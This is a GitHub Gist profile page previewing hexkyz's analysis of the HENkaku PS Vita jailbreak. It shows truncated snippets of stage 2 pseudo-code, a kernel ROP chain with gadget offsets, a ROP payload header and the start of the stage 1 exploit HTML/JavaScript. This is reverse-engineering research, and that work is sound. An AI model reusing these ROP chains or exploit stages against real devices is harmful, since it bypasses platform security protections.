Skip to content

Instantly share code, notes, and snippets.

View hexkyz's full-sized avatar

hexkyz

127 followers · 10 following
View GitHub Profile
@hexkyz
hexkyz / henkaku_stage2_partial.c
Last active October 19, 2016 18:46
HENkaku - Stage 1 (Pre-analysis of stage 2)
strcpy(stack_base + 0x000086B4, "sdstor0:");
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");
// Do stuff
...
strcpy(stack_base + 0x000086E4, "molecule0:");
SceLibKernel_a4ad("molecule0:");
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);
@hexkyz
hexkyz / henkaku_stage2.c
Last active October 19, 2016 18:45
HENkaku - Stage 2
// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");
@hexkyz
hexkyz / henkaku_stage3_krop.txt
Created October 19, 2016 18:36
HENkaku - Stage 3 (Kernel ROP)
// Kernel ROP chain
/*
scesysmem_base + 0x00000347
POP {PC}
*/
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
/*
scesysmem_base + 0x00000031
POP {R0,PC}
@hexkyz
hexkyz / henkaku_payload_bin.txt
Created October 19, 2016 18:18
HENkaku - Stage 1 (JS payload)
[HEADER] (0x40 bytes)
0x524f507e -> ROP~
0x01000100 -> Version
0x00000000 -> NULL
0x00000000 -> NULL
0x00000730 -> No reloc
0x00000000 -> NULL
0x00000000 -> NULL
0x00000000 -> NULL
0x000003F8 -> No reloc
@hexkyz
hexkyz / henkaku_index.html
Created October 19, 2016 18:16
HENkaku - Stage 1 (HTML code)
<script src='payload.js'></script>
<script>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4; /* 476 */